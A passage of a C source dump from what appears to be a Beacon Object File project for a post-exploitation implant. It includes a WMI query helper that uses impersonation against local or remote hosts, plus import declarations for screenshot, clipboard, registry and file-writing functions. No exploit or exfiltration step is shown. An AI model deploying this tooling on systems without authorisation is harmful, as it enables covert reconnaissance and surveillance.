DYNAMIC_LIB_COUNT 221 | DWORD i; 222 | for(i = 0; i < loadedLibrariesCount; i++) 223 | { 224 | FreeLibrary(loadedLibraries[i].hMod); 225 | } 226 | #endif 227 | return; 228 | } 229 | -------------------------------------------------------------------------------- /common/wmi.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include "beacon.h" 11 | #include "bofdefs.h" 12 | #include "wmi.h" 13 | 14 | #define KEY_SEPARATOR L" ,\t\n" 15 | #define HEADER_ROW 0 16 | #define WMI_QUERY_LANGUAGE L"WQL" 17 | #define WMI_NAMESPACE_CIMV2 L"root\\cimv2" 18 | #define RESOURCE_FMT_STRING L"\\\\%s\\%s" 19 | #define RESOURCE_LOCAL_HOST L"." 20 | #define ERROR_RESULT L"*ERROR*" 21 | #define EMPTY_RESULT L"(EMPTY)" 22 | #define NULL_RESULT L"(NULL)" 23 | 24 | #define SAFE_DESTROY( arraypointer ) \ 25 | if ( (arraypointer) != NULL ) \ 26 | { \ 27 | OLEAUT32$SafeArrayDestroy(arraypointer); \ 28 | (arraypointer) = NULL; \ 29 | } 30 | #define SAFE_RELEASE( interfacepointer ) \ 31 | if ( (interfacepointer) != NULL ) \ 32 | { \ 33 | (interfacepointer)->lpVtbl->Release(interfacepointer); \ 34 | (interfacepointer) = NULL; \ 35 | } 36 | #define SAFE_FREE( string_ptr ) \ 37 | if ( (string_ptr) != NULL ) \ 38 | { \ 39 | OLEAUT32$SysFreeString(string_ptr); \ 40 | (string_ptr) = NULL; \ 41 | } 42 | 43 | 44 | 45 | HRESULT Wmi_Initialize(WMI* pWmi) 46 | { 47 | HRESULT hr = S_OK; 48 | 49 | pWmi->pWbemServices = NULL; 50 | pWmi->pWbemLocator = NULL; 51 | pWmi->pEnumerator = NULL; 52 | pWmi->bstrLanguage = NULL; 53 | pWmi->bstrNameSpace = NULL; 54 | pWmi->bstrQuery = NULL; 55 | 56 | pWmi->bstrLanguage = OLEAUT32$SysAllocString(WMI_QUERY_LANGUAGE); 57 | pWmi->bstrNameSpace = OLEAUT32$SysAllocString(WMI_NAMESPACE_CIMV2); 58 | 59 | // Initialize COM parameters 60 | hr = OLE32$CoInitializeEx( 61 | NULL, 62 | COINIT_APARTMENTTHREADED 63 | ); 64 | if (hr == RPC_E_CHANGED_MODE) { 65 | hr = S_OK; 66 | } else if (FAILED(hr)) { 67 | BeaconPrintf(CALLBACK_ERROR, "OLE32$CoInitializeEx failed: 0x%08lx", hr); 68 | goto fail; 69 | } 70 | hr = OLE32$CoInitializeSecurity( //Failure of this function does not necessarily mean we failed to initialize, it will fail on repeated calls, but the values from the original call are retained 71 | NULL, 72 | -1, 73 | NULL, 74 | NULL, 75 | RPC_C_AUTHN_LEVEL_DEFAULT, 76 | RPC_C_IMP_LEVEL_IMPERSONATE, 77 | NULL, 78 | EOAC_DYNAMIC_CLOAKING, 79 | NULL); 80 | if (FAILED(hr)) 81 | { 82 | BeaconPrintf(CALLBACK_ERROR, "Failed to set security, token impersonation may not work\n"); 83 | } 84 | 85 | hr = S_OK; 86 | 87 | fail: 88 | 89 | return hr; 90 | } 91 | 92 | HRESULT Wmi_Connect( 93 | WMI* pWmi, 94 | LPWSTR resource 95 | ) 96 | { 97 | HRESULT hr = S_OK; 98 | CLSID CLSID_WbemLocator = { 0x4590F811, 0x1D3A, 0x11D0, {0x89, 0x1F, 0, 0xAA, 0, 0x4B, 0x2E, 0x24} }; 99 | IID IID_IWbemLocator = { 0xDC12A687, 0x737F, 0x11CF, {0x88, 0x4D, 0, 0xAA, 0, 0x4B, 0x2E, 0x24} }; 100 | 101 | 102 | // Set the properties in the WMI object 103 | BSTR bstrNetworkResource = OLEAUT32$SysAllocString(resource); 104 | 105 | // Obtain the initial locator to Windows Management on host computer 106 | SAFE_RELEASE(pWmi->pWbemLocator); 107 | hr = OLE32$CoCreateInstance( 108 | &CLSID_WbemLocator, 109 | 0, 110 | CLSCTX_ALL, 111 | &IID_IWbemLocator, 112 | (LPVOID *)&(pWmi->pWbemLocator) 113 | ); 114 | if (FAILED(hr)) 115 | { 116 | BeaconPrintf(CALLBACK_ERROR, "OLE32$CoCreateInstance failed: 0x%08lx", hr); 117 | OLE32$CoUninitialize(); 118 | goto fail; 119 | } 120 | 121 | // Connect to the WMI namespace on host computer with the current user 122 | hr = pWmi->pWbemLocator->lpVtbl->ConnectServer( 123 | pWmi->pWbemLocator, 124 | bstrNetworkResource, 125 | NULL, 126 | NULL, 127 | NULL, 128 | 0, 129 | NULL, 130 | NULL, 131 | &(pWmi->pWbemServices) 132 | ); 133 | if (FAILED(hr)) 134 | { 135 | BeaconPrintf(CALLBACK_ERROR, "ConnectServer to %ls failed: 0x%08lx", bstrNetworkResource, hr); 136 | goto fail; 137 | } 138 | 139 | // Set the IWbemServices proxy so that impersonation of the user (client) occurs 140 | hr = OLE32$CoSetProxyBlanket( 141 | (IUnknown *)(pWmi->pWbemServices), 142 | RPC_C_AUTHN_WINNT, 143 | RPC_C_AUTHZ_NONE, 144 | NULL, 145 | RPC_C_AUTHN_LEVEL_DEFAULT, 146 | RPC_C_IMP_LEVEL_IMPERSONATE, 147 | NULL, 148 | EOAC_DYNAMIC_CLOAKING 149 | ); 150 | if (FAILED(hr)) 151 | { 152 | BeaconPrintf(CALLBACK_ERROR, "OLE32$CoSetProxyBlanket failed: 0x%08lx", hr); 153 | goto fail; 154 | } 155 | hr = S_OK; 156 | 157 | fail: 158 | if(bstrNetworkResource) 159 | { 160 | OLEAUT32$SysFreeString(bstrNetworkResource); 161 | } 162 | 163 | return hr; 164 | } 165 | 166 | HRESULT Wmi_Query( 167 | WMI* pWmi, 168 | LPWSTR pwszQuery 169 | ) 170 | { 171 | HRESULT hr = 0; 172 | 173 | // Free any previous queries 174 | SAFE_FREE(pWmi->bstrQuery); 175 | 176 | // Set the query 177 | pWmi->bstrQuery = OLEAUT32$SysAllocString(pwszQuery); 178 | 179 | // Free any previous results 180 | SAFE_RELEASE(pWmi->pEnumerator); 181 | 182 | // Use the IWbemServices pointer to make requests of WMI 183 | hr = pWmi->pWbemServices->lpVtbl->ExecQuery( 184 | pWmi->pWbemServices, 185 | pWmi->bstrLanguage, 186 | pWmi->bstrQuery, 187 | WBEM_FLAG_BIDIRECTIONAL, 188 | NULL, 189 | &(pWmi->pEnumerator)); 190 | if (FAILED(hr)) 191 | { 192 | BeaconPrintf(CALLBACK_ERROR, "ExecQuery failed: 0x%08lx", hr); 193 | SAFE_RELEASE(pWmi->pEnumerator); 194 | goto fail; 195 | } 196 | 197 | 198 | hr = S_OK; 199 | 200 | fail: 201 | return hr; 202 | } 203 | 204 | 205 | HRESULT Wmi_ParseResults( 206 | WMI* pWmi, 207 | LPWSTR pwszKeys, 208 | BSTR*** ppwszResults, 209 | LPDWORD pdwRowCount, 210 | LPDWORD pdwColumnCount 211 | ) 212 | { 213 | HRESULT hr = 0; 214 | BSTR bstrColumns = NULL; 215 | BSTR** bstrResults = NULL; 216 | BSTR* bstrCurrentRow = NULL; 217 | DWORD dwColumnCount = 1; 218 | DWORD dwRowCount = 0; 219 | LPWSTR pCurrentKey = NULL; 220 | DWORD dwIndex = 0; 221 | IWbemClassObject *pWbemClassObjectResult = NULL; 222 | ULONG ulResultCount = 0; 223 | VARIANT varProperty; 224 | 225 | // Fill in the header row 226 | // Count the number of header columns 227 | bstrColumns = OLEAUT32$SysAllocString(pwszKeys); 228 | for(dwIndex = 0; bstrColumns[dwIndex]; dwIndex++) 229 | { 230 | if (bstrColumns[dwIndex] == L',') 231 | dwColumnCount++; 232 | } 233 | // Allocate space for the columns in the header row 234 | bstrCurrentRow = (BSTR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(BSTR)*dwColumnCount); 235 | if (NULL == bstrCurrentRow) 236 | { 237 | hr = WBEM_E_OUT_OF_MEMORY; 238 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapAlloc failed: 0x%08lx", hr); 239 | goto fail; 240 | } 241 | // Fill in each column in the header row 242 | pCurrentKey = MSVCRT$wcstok(bstrColumns, KEY_SEPARATOR); ; 243 | for(dwIndex = 0; pCurrentKey; dwIndex++) 244 | { 245 | bstrCurrentRow[dwIndex] = OLEAUT32$SysAllocString(pCurrentKey); 246 | pCurrentKey = MSVCRT$wcstok(NULL, KEY_SEPARATOR); 247 | } 248 | // Allocate space for the results including the current row 249 | dwRowCount++; 250 | bstrResults = (BSTR**)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(BSTR*)*dwRowCount); 251 | if (NULL == bstrResults) 252 | { 253 | hr = WBEM_E_OUT_OF_MEMORY; 254 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapAlloc failed: 0x%08lx", hr); 255 | goto fail; 256 | } 257 | bstrResults[dwRowCount-1] = bstrCurrentRow; 258 | bstrCurrentRow = NULL; 259 | 260 | // Loop through the enumeration of results 261 | hr = WBEM_S_NO_ERROR; 262 | while (WBEM_S_NO_ERROR == hr) 263 | { 264 | // Get the next result in our enumeration of results 265 | hr = pWmi->pEnumerator->lpVtbl->Next(pWmi->pEnumerator, WBEM_INFINITE, 1, &pWbemClassObjectResult, &ulResultCount); //Scanbuild false positive 266 | if (hr == S_OK && ulResultCount > 0) 267 | { 268 | if (pWbemClassObjectResult == NULL) 269 | { 270 | continue; 271 | } 272 | 273 | // Allocate space for the columns in the current row 274 | bstrCurrentRow = (BSTR*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, sizeof(BSTR)*dwColumnCount); 275 | if (NULL == bstrCurrentRow) 276 | { 277 | hr = WBEM_E_OUT_OF_MEMORY; 278 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapAlloc failed: 0x%08lx", hr); 279 | goto fail; 280 | } 281 | 282 | // Loop through each column/key and get that property from the current result 283 | for (dwIndex = 0; dwIndex < dwColumnCount; dwIndex++) 284 | { 285 | pCurrentKey = bstrResults[HEADER_ROW][dwIndex]; 286 | 287 | OLEAUT32$VariantInit(&varProperty); 288 | 289 | // Get the corresponding entry from the current result for the current key 290 | hr = pWbemClassObjectResult->lpVtbl->Get(pWbemClassObjectResult, pCurrentKey, 0, &varProperty, 0, 0); 291 | if (FAILED(hr)) 292 | { 293 | BeaconPrintf(CALLBACK_ERROR, "pWbemClassObjectResult->lpVtbl->Get failed: 0x%08lx", hr); 294 | //goto fail; 295 | continue; 296 | } 297 | 298 | if (VT_EMPTY == varProperty.vt) 299 | { 300 | bstrCurrentRow[dwIndex] = OLEAUT32$SysAllocString(EMPTY_RESULT); 301 | } 302 | else if (VT_NULL == varProperty.vt) 303 | { 304 | bstrCurrentRow[dwIndex] = OLEAUT32$SysAllocString(NULL_RESULT); 305 | } 306 | else 307 | { 308 | hr = OLEAUT32$VariantChangeType(&varProperty, &varProperty, VARIANT_ALPHABOOL, VT_BSTR); 309 | if (FAILED(hr)) 310 | { 311 | hr = WBEM_S_NO_ERROR; 312 | bstrCurrentRow[dwIndex] = OLEAUT32$SysAllocString(ERROR_RESULT); 313 | } 314 | else 315 | { 316 | bstrCurrentRow[dwIndex] = OLEAUT32$SysAllocString(varProperty.bstrVal); 317 | } 318 | } 319 | 320 | OLEAUT32$VariantClear(&varProperty); 321 | 322 | } // end for loop through each column/key 323 | 324 | // Allocate space for the results including the current row 325 | dwRowCount++; 326 | bstrResults = (BSTR**)KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, bstrResults, sizeof(BSTR*)*dwRowCount); 327 | if (NULL == bstrResults) 328 | { 329 | hr = WBEM_E_OUT_OF_MEMORY; 330 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapReAlloc failed: 0x%08lx", hr); 331 | goto fail; 332 | } 333 | bstrResults[dwRowCount - 1] = bstrCurrentRow; 334 | bstrCurrentRow = NULL; 335 | 336 | // Release the current result 337 | pWbemClassObjectResult->lpVtbl->Release(pWbemClassObjectResult); 338 | 339 | } // end if we got a pWbemClassObjectResult 340 | 341 | } // end While loop through enumeration of results 342 | 343 | 344 | *ppwszResults = bstrResults; 345 | *pdwRowCount = dwRowCount; 346 | *pdwColumnCount = dwColumnCount; 347 | fail: 348 | SAFE_FREE(bstrColumns); 349 | 350 | return hr; 351 | } 352 | 353 | // Get a list of all the properties returned from the query 354 | // Then call the normal ParseResults using all the returned 355 | // properties as the keys/columns 356 | HRESULT Wmi_ParseAllResults( 357 | WMI* pWmi, 358 | BSTR*** ppwszResults, 359 | LPDWORD pdwRowCount, 360 | LPDWORD pdwColumnCount 361 | ) 362 | { 363 | HRESULT hr = 0; 364 | IWbemClassObject *pWbemClassObjectResult = NULL; 365 | ULONG ulResultCount = 0; 366 | LONG lFlags = WBEM_FLAG_ALWAYS | WBEM_FLAG_NONSYSTEM_ONLY; 367 | SAFEARRAY* psaProperties = NULL; 368 | LONG lLBound = 0; 369 | LONG lUBound = 0; 370 | size_t ullKeysLength = 1; 371 | LPWSTR pwszKeys = NULL; 372 | LONG lKeyCount = 0; 373 | VARIANT varProperty; 374 | 375 | pwszKeys = (LPWSTR)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, ullKeysLength*sizeof(wchar_t)); 376 | if (NULL == pwszKeys) 377 | { 378 | hr = WBEM_E_OUT_OF_MEMORY; 379 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapAlloc failed: 0x%08lx", hr); 380 | goto fail; 381 | } 382 | 383 | // Get the first result in our enumeration of results 384 | hr = pWmi->pEnumerator->lpVtbl->Next(pWmi->pEnumerator, WBEM_INFINITE, 1, &pWbemClassObjectResult, &ulResultCount); 385 | if (FAILED(hr)) 386 | { 387 | BeaconPrintf(CALLBACK_ERROR, "pEnumerator->Next failed: 0x%08lx", hr); 388 | goto fail; 389 | } 390 | else if (ulResultCount == 0 || pWbemClassObjectResult == NULL) 391 | { 392 | BeaconPrintf(CALLBACK_ERROR, "No results"); 393 | goto fail; 394 | } 395 | 396 | 397 | // Get a list of all the properties in the object 398 | hr = pWbemClassObjectResult->lpVtbl->GetNames(pWbemClassObjectResult, NULL, lFlags, NULL, &psaProperties ); 399 | if ( FAILED(hr) ) 400 | { 401 | BeaconPrintf(CALLBACK_ERROR, "pWbemClassObjectResult->GetNames failed: 0x%08lx", hr); 402 | goto fail; 403 | } 404 | hr = OLEAUT32$SafeArrayGetLBound(psaProperties, 1, &lLBound); 405 | if ( FAILED(hr) ) 406 | { 407 | BeaconPrintf(CALLBACK_ERROR, "OLEAUT32$SafeArrayGetLBound failed: 0x%08lx", hr); 408 | goto fail; 409 | } 410 | hr = OLEAUT32$SafeArrayGetUBound(psaProperties, 1, &lUBound); 411 | if ( FAILED(hr) ) 412 | { 413 | BeaconPrintf(CALLBACK_ERROR, "OLEAUT32$SafeArrayGetUBound failed: 0x%08lx", hr); 414 | goto fail; 415 | } 416 | 417 | // Iterate through all the properties and create a CSV key list 418 | for (LONG lIndex = lLBound; lIndex <= lUBound; ++lIndex ) 419 | { 420 | LPWSTR pwszCurrentName = NULL; 421 | hr = OLEAUT32$SafeArrayGetElement(psaProperties, &lIndex, &pwszCurrentName); 422 | if ( FAILED(hr) ) 423 | { 424 | BeaconPrintf(CALLBACK_ERROR, "OLEAUT32$SafeArrayGetElement(%ld) failed: 0x%08lx", lIndex, hr); 425 | goto fail; 426 | } 427 | 428 | OLEAUT32$VariantInit(&varProperty); 429 | 430 | // Get the corresponding property for the current property name 431 | hr = pWbemClassObjectResult->lpVtbl->Get(pWbemClassObjectResult, pwszCurrentName, 0, &varProperty, 0, 0); 432 | if (FAILED(hr)) 433 | { 434 | BeaconPrintf(CALLBACK_ERROR, "pWbemClassObjectResult->lpVtbl->Get failed: 0x%08lx", hr); 435 | //goto fail; 436 | continue; 437 | } 438 | 439 | // Check the type of property because we aren't interested in references 440 | if (VT_BYREF & varProperty.vt) 441 | { 442 | BeaconPrintf(CALLBACK_OUTPUT, "%S is a reference, so skip", pwszCurrentName); 443 | } 444 | else 445 | { 446 | ullKeysLength = ullKeysLength + MSVCRT$wcslen( pwszCurrentName ) + 1; 447 | pwszKeys = (LPWSTR)KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), HEAP_ZERO_MEMORY, pwszKeys, sizeof(wchar_t)*ullKeysLength); 448 | if (NULL == pwszKeys) 449 | { 450 | hr = WBEM_E_OUT_OF_MEMORY; 451 | BeaconPrintf(CALLBACK_ERROR, "KERNEL32$HeapReAlloc failed: 0x%08lx", hr); 452 | OLEAUT32$VariantClear(&varProperty); 453 | goto fail; 454 | } 455 | // If this isn't the first column, prepend a comma 456 | if ( 0 != lKeyCount ) 457 | { 458 | pwszKeys = MSVCRT$wcscat(pwszKeys, L","); 459 | } 460 | pwszKeys = MSVCRT$wcscat(pwszKeys, pwszCurrentName); 461 | 462 | lKeyCount++; 463 | } 464 | 465 | OLEAUT32$VariantClear(&varProperty); 466 | } 467 | 468 | // Release the current result 469 | pWbemClassObjectResult->lpVtbl->Release(pWbemClassObjectResult); 470 | 471 | // Reset the enumeration 472 | hr = pWmi->pEnumerator->lpVtbl->Reset(pWmi->pEnumerator); 473 | if ( FAILED(hr) ) 474 | { 475 | BeaconPrintf(CALLBACK_ERROR, "Reset failed: 0x%08lx", hr); 476 | goto fail; 477 | } 478 | 479 | // Get the results for all the properties using the newly create key list 480 | hr = Wmi_ParseResults( pWmi, pwszKeys, ppwszResults, pdwRowCount, pdwColumnCount ); 481 | 482 | fail: 483 | 484 | if (pwszKeys) 485 | { 486 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pwszKeys); 487 | pwszKeys = NULL; 488 | } 489 | 490 | SAFE_DESTROY(psaProperties); 491 | 492 | return hr; 493 | } 494 | 495 | void Wmi_Finalize( 496 | WMI* pWmi 497 | ) 498 | { 499 | SAFE_RELEASE(pWmi->pWbemServices); 500 | SAFE_RELEASE(pWmi->pWbemLocator); 501 | 502 | SAFE_FREE(pWmi->bstrLanguage); 503 | SAFE_FREE(pWmi->bstrNameSpace); 504 | SAFE_FREE(pWmi->bstrQuery); 505 | 506 | // un-initialize the COM library 507 | OLE32$CoUninitialize(); 508 | 509 | return; 510 | } 511 | -------------------------------------------------------------------------------- /bofdefs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | /* some code and/or ideas are from trustedsec SA Github repo -- thankyou trustedsec! */ 3 | #include 4 | #include 5 | 6 | #ifdef BOF 7 | 8 | #ifdef __cplusplus 9 | extern "C" { 10 | #endif 11 | 12 | #include "beacon.h" 13 | 14 | void go(char* buff, int len); 15 | 16 | 17 | /* 7/2/2025 update*/ 18 | 19 | DECLSPEC_IMPORT int WINAPI MSVCRT$fclose(FILE* stream); 20 | #define fclose MSVCRT$fclose 21 | 22 | DECLSPEC_IMPORT FILE* WINAPI MSVCRT$fopen(const char* filename, const char* mode); 23 | #define fopen MSVCRT$fopen 24 | 25 | DECLSPEC_IMPORT size_t WINAPI MSVCRT$fwrite(const void* ptr, size_t size, size_t count, FILE* stream); 26 | #define fwrite MSVCRT$fwrite 27 | 28 | DECLSPEC_IMPORT BOOL WINAPI User32$ShowWindow(HWND hWnd, int nCmdShow); 29 | #define ShowWindow User32$ShowWindow 30 | 31 | DECLSPEC_IMPORT BOOL WINAPI User32$PrintWindow(HWND hWnd, HDC hdcBlt, UINT nFlags); 32 | #define PrintWindow User32$PrintWindow 33 | 34 | DECLSPEC_IMPORT BOOL WINAPI User32$SetLayeredWindowAttributes(HWND hwnd, COLORREF crKey, BYTE bAlpha, DWORD dwFlags); 35 | #define SetLayeredWindowAttributes User32$SetLayeredWindowAttributes 36 | 37 | DECLSPEC_IMPORT BOOL WINAPI User32$SetWindowPos(HWND hWnd, HWND hWndInsertAfter, int X, int Y, int cx, int cy, UINT uFlags); 38 | #define SetWindowPos User32$SetWindowPos 39 | 40 | DECLSPEC_IMPORT BOOL WINAPI User32$GetWindowPlacement(HWND hWnd, WINDOWPLACEMENT* lpwndpl); 41 | #define GetWindowPlacement User32$GetWindowPlacement 42 | 43 | DECLSPEC_IMPORT BOOL WINAPI User32$IsWindowVisible(HWND hWnd); 44 | #define IsWindowVisible User32$IsWindowVisible 45 | 46 | DECLSPEC_IMPORT BOOL WINAPI User32$UpdateWindow(HWND hWnd); 47 | #define UpdateWindow User32$UpdateWindow 48 | 49 | DECLSPEC_IMPORT BOOL WINAPI User32$GetWindowRect(HWND hWnd, LPRECT lpRect); 50 | #define GetWindowRect User32$GetWindowRect 51 | 52 | DECLSPEC_IMPORT LONG WINAPI User32$GetWindowLongA(HWND hWnd, int nIndex); 53 | #define GetWindowLongA User32$GetWindowLongA 54 | 55 | DECLSPEC_IMPORT LONG WINAPI User32$SetWindowLongA(HWND hWnd, int nIndex, LONG dwNewLong); 56 | #define SetWindowLongA User32$SetWindowLongA 57 | 58 | DECLSPEC_IMPORT BOOL WINAPI User32$EnumWindows(WNDENUMPROC lpEnumFunc, LPARAM lParam); 59 | 60 | DECLSPEC_IMPORT DWORD WINAPI User32$GetWindowThreadProcessId(HWND hWnd, LPDWORD lpdwProcessId); 61 | #define GetWindowThreadProcessId User32$GetWindowThreadProcessId 62 | 63 | 64 | /* resolve some extra funcs for the screenshot */ 65 | 66 | 67 | DECLSPEC_IMPORT DWORD WINAPI User32$MessageBoxA(HWND, LPCTSTR, LPCTSTR, UINT); 68 | #define MessageBoxCustom User32$MessageBoxA 69 | 70 | DECLSPEC_IMPORT int WINAPI User32$GetSystemMetrics(int nIndex); 71 | #define GetSystemMetrics User32$GetSystemMetrics 72 | 73 | DECLSPEC_IMPORT BOOL WINAPI User32$SetProcessDPIAware(); 74 | #define SetProcessDPIAware User32$SetProcessDPIAware 75 | 76 | DECLSPEC_IMPORT HDC WINAPI User32$GetDC(HWND hWnd); 77 | #define GetDC User32$GetDC 78 | 79 | DECLSPEC_IMPORT HDC WINAPI GDI32$CreateCompatibleDC(HDC hdc); 80 | #define CreateCompatibleDC GDI32$CreateCompatibleDC 81 | 82 | DECLSPEC_IMPORT HBITMAP WINAPI GDI32$CreateCompatibleBitmap(HDC hdc, int cx, int cy); 83 | #define CreateCompatibleBitmap GDI32$CreateCompatibleBitmap 84 | 85 | DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$SelectObject(HDC hdc, HGDIOBJ h); 86 | #define SelectObject GDI32$SelectObject 87 | 88 | DECLSPEC_IMPORT BOOL WINAPI GDI32$BitBlt(HDC hdc, 89 | int x, 90 | int y, 91 | int cx, 92 | int cy, 93 | HDC hdcSrc, 94 | int x1, 95 | int y1, 96 | DWORD rop); 97 | #define BitBlt GDI32$BitBlt 98 | 99 | DECLSPEC_IMPORT BOOL WINAPI User32$OpenClipboard(HWND hWndNewOwner); 100 | #define OpenClipboard User32$OpenClipboard 101 | 102 | DECLSPEC_IMPORT BOOL WINAPI User32$EmptyClipboard(); 103 | #define EmptyClipboard User32$EmptyClipboard 104 | 105 | DECLSPEC_IMPORT BOOL WINAPI User32$SetClipboardData(UINT uFormat, HANDLE hMem); 106 | #define SetClipboardData User32$SetClipboardData 107 | 108 | DECLSPEC_IMPORT BOOL WINAPI User32$CloseClipboard(); 109 | #define CloseClipboard User32$CloseClipboard 110 | 111 | DECLSPEC_IMPORT BOOL WINAPI GDI32$DeleteDC(HDC hdc); 112 | #define DeleteDC GDI32$DeleteDC 113 | 114 | DECLSPEC_IMPORT int WINAPI User32$ReleaseDC(HWND hWnd, HDC hDC); 115 | #define ReleaseDC User32$ReleaseDC 116 | 117 | DECLSPEC_IMPORT HGDIOBJ WINAPI GDI32$DeleteObject(HGDIOBJ ho); 118 | #define DeleteObject GDI32$DeleteObject 119 | 120 | 121 | 122 | /* End of function resolutions for screenshot */ 123 | 124 | /* Resolve some functions for writing BMP to disk*/ 125 | 126 | DECLSPEC_IMPORT HDC WINAPI GDI32$CreateDCA(LPCSTR pwszDriver, 127 | LPCSTR pwszDevice, 128 | LPCSTR pszPort, 129 | const DEVMODEA* pdm); 130 | #define CreateDCA GDI32$CreateDCA 131 | 132 | DECLSPEC_IMPORT int WINAPI GDI32$GetDeviceCaps(HDC hdc, 133 | int index); 134 | #define GetDeviceCaps GDI32$GetDeviceCaps 135 | 136 | DECLSPEC_IMPORT int WINAPI GDI32$GetObjectA(HANDLE h, 137 | int c, 138 | LPVOID pv); 139 | #define GetObjectA GDI32$GetObjectA 140 | DECLSPEC_IMPORT HGLOBAL WINAPI KERNEL32$GlobalAlloc( 141 | UINT uFlags, 142 | SIZE_T dwBytes); 143 | #define GlobalAlloc KERNEL32$GlobalAlloc 144 | 145 | DECLSPEC_IMPORT WINBASEAPI LPVOID WINAPI KERNEL32$GlobalLock(HGLOBAL); 146 | #define GlobalLock KERNEL32$GlobalLock 147 | 148 | DECLSPEC_IMPORT WINGDIAPI HGDIOBJ WINAPI GDI32$GetStockObject(int); 149 | #define GetStockObject GDI32$GetStockObject 150 | 151 | DECLSPEC_IMPORT WINGDIAPI HPALETTE WINAPI GDI32$SelectPalette(HDC, HPALETTE, BOOL); 152 | #define SelectPalette GDI32$SelectPalette 153 | 154 | DECLSPEC_IMPORT WINGDIAPI UINT WINAPI GDI32$RealizePalette(HDC); 155 | #define RealizePalette GDI32$RealizePalette 156 | 157 | DECLSPEC_IMPORT WINGDIAPI int WINAPI GDI32$GetDIBits(HDC hdc, 158 | HBITMAP hbm, 159 | UINT start, 160 | UINT cLines, 161 | LPVOID lpvBits, 162 | LPBITMAPINFO lpbmi, 163 | UINT usage); 164 | #define GetDIBits GDI32$GetDIBits 165 | 166 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$GlobalUnlock(HGLOBAL); 167 | #define GlobalUnlock KERNEL32$GlobalUnlock 168 | 169 | DECLSPEC_IMPORT WINBASEAPI HGLOBAL WINAPI KERNEL32$GlobalFree(HGLOBAL); 170 | #define GlobalFree KERNEL32$GlobalFree 171 | 172 | DECLSPEC_IMPORT WINBASEAPI BOOL WINAPI KERNEL32$CloseHandle(HANDLE); 173 | #define CloseHandle KERNEL32$CloseHandle 174 | 175 | 176 | 177 | 178 | /* End of function resolutions for writing BMP to disk */ 179 | 180 | 181 | /* COM */ 182 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString(LPCWSTR, LPCLSID); 183 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID* ppv); 184 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx(LPVOID, DWORD); 185 | DECLSPEC_IMPORT VOID WINAPI OLE32$CoUninitialize(); 186 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString(LPWSTR lpsz, LPIID lpiid); 187 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitialize(LPVOID pvReserved); 188 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstanceEx(REFCLSID, IUnknown*, DWORD, COSERVERINFO*, DWORD, MULTI_QI*); 189 | DECLSPEC_IMPORT BSTR WINAPI OleAut32$SysAllocString(const OLECHAR*); 190 | DECLSPEC_IMPORT LPVOID WINAPI OLEAUT32$VariantInit(VARIANTARG* pvarg); 191 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity(PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE* asAuthSvc, void* pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void* pAuthList, DWORD dwCapabilities, void* pReserved3); 192 | 193 | /* Registry */ 194 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegOpenKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD ulOptions, REGSAM samDesired, PHKEY phkResult); 195 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegDeleteTreeA(HKEY hKey, LPCSTR lpSubKey); 196 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegCreateKeyExA(HKEY hKey, LPCSTR lpSubKey, DWORD Reserved, LPSTR lpClass, DWORD dwOptions, REGSAM samDesired, 197 | CONST LPSECURITY_ATTRIBUTES lpSecurityAttributes, PHKEY phkResult, LPDWORD lpdwDisposition); 198 | DECLSPEC_IMPORT LSTATUS APIENTRY ADVAPI32$RegSetValueExA(HKEY hKey, LPCSTR lpValueName, DWORD Reserved, DWORD dwType, 199 | CONST BYTE* lpData, DWORD cbData); 200 | 201 | 202 | /* FileSystem */ 203 | DECLSPEC_IMPORT HANDLE WINAPI KERNEL32$CreateFileA(LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile); 204 | DECLSPEC_IMPORT DWORD WINAPI KERNEL32$SetFilePointer(HANDLE hFile, LONG lDistanceToMove, PLONG lpDistanceToMoveHigh, DWORD dwMoveMethod); 205 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$SetFilePointerEx(HANDLE hFile, LARGE_INTEGER liDistanceToMove, PLARGE_INTEGER lpDistanceToMoveHigh, DWORD dwMoveMethod); 206 | DECLSPEC_IMPORT BOOL WINAPI KERNEL32$WriteFile(HANDLE hFile, LPCVOID lpBuffer, DWORD nNumberOfBytesToWrite, LPDWORD lpNumberOfBytesWritten, LPOVERLAPPED lpOverlapped); 207 | DECLSPEC_IMPORT BOOL WINAPI 